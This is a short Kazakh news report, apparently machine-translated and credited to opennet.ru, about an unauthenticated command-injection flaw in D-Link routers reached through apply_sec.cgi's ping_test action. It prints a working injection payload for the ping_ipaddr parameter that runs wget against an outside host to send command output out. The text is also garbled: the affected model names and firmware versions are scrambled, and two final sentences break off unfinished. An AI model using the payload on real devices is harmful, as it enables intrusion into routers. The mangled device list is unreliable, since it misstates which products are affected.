D-Link сымсыз маршрутизаторларында
Бір қызығы, микробағдарлама әзірлеушілерінің айтуынша, «ping_test» қоңырауы аутентификациядан кейін ғана орындалуы керек, бірақ шын мәнінде ол веб-интерфейске кіруге қарамастан кез келген жағдайда шақырылады. Атап айтқанда, apply_sec.cgi сценарийіне қатынасу және «action=ping_test» параметрін беру кезінде сценарий аутентификация бетіне қайта бағыттайды, бірақ сонымен бірге ping_test-пен байланысты әрекетті орындайды. Кодты орындау үшін тестілеуге жіберілген IP мекенжайының дұрыстығын дұрыс тексермей ping утилитасын шақыратын ping_test-тің өзінде басқа осалдық пайдаланылды. Мысалы, wget утилитасына қоңырау шалу және «echo 1234» пәрменінің нәтижелерін сыртқы хостқа тасымалдау үшін «ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// параметрін көрсетіңіз. test.test/?$( echo 1234)».
Төмендегі модельдерде осалдықтың болуы ресми түрде расталды:
- 655b3.02 немесе одан жоғары микробағдарламасы бар DIR-05;
- 866b1.03 немесе одан жоғары микробағдарламасы бар DIR-04L;
- DIR-1565 микробағдарламасы 1.01 немесе одан жоғары;
- DIR-652 (проблемалық микробағдарлама нұсқалары туралы ақпарат берілмейді)
Бұл үлгілерге қолдау көрсету мерзімі әлдеқашан бітті, сондықтан D-Link
Кейіннен осалдықтың да болғаны анықталды
Ақпарат көзі: opennet.ru